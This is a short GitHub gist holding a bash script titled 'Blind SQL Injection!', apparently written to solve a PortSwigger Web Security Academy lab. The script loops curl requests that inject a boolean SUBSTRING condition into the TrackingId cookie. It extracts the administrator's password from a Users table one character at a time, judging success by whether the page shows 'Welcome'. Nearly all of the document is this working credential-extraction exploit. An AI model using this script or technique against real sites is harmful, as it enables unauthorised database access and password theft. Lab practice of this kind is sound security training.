Skip to content

Instantly share code, notes, and snippets.

@svanellewee
Last active June 15, 2021 20:37
Show Gist options
  • Save svanellewee/4a776a42db7bd09dd094882013afc313 to your computer and use it in GitHub Desktop.
Save svanellewee/4a776a42db7bd09dd094882013afc313 to your computer and use it in GitHub Desktop.
Blind SQL Injection!
#!/usr/bin/env bash
# Copy the GET request, and insert the blind SQL in the TrackingId value...
# Then add a changing variable in the query
alpha=( {a..z} {A..Z} {0..9} \( \) % $ @ \& \# \* \& ^ \~ + _ / )
results=()
for index in {1..100}
do
for ((chi=0;chi<$(( "${#alpha[@]}" - 2 ));chi++))
do
a="${alpha[${chi}]}"
curl 'https://ac2e1f191ee6e67680981fd200c50090.web-security-academy.net/' \
-H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' \
-H 'Accept-Language: en-US,en;q=0.5' \
--compressed \
-H 'Referer: https://portswigger.net/' \
-H 'Connection: keep-alive' \
-H "Cookie: TrackingId=xaaw' OR SUBSTRING((SELECT Password FROM Users WHERE Username = 'administrator'), ${index}, 1) = '${a}; session=VkyBAyZ5d5nGU1euvjZwkkh9Pv01gmS3" \
-H 'Upgrade-Insecure-Requests: 1' -H 'Cache-Control: max-age=0' -s | grep Welcome -q
if [[ $? -eq 0 ]]
then
results=(${results[@]} ${a} )
echo ">>>>>${results[*]}"
break
else
echo "nope"
fi
done
done
echo "${results[*]}"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment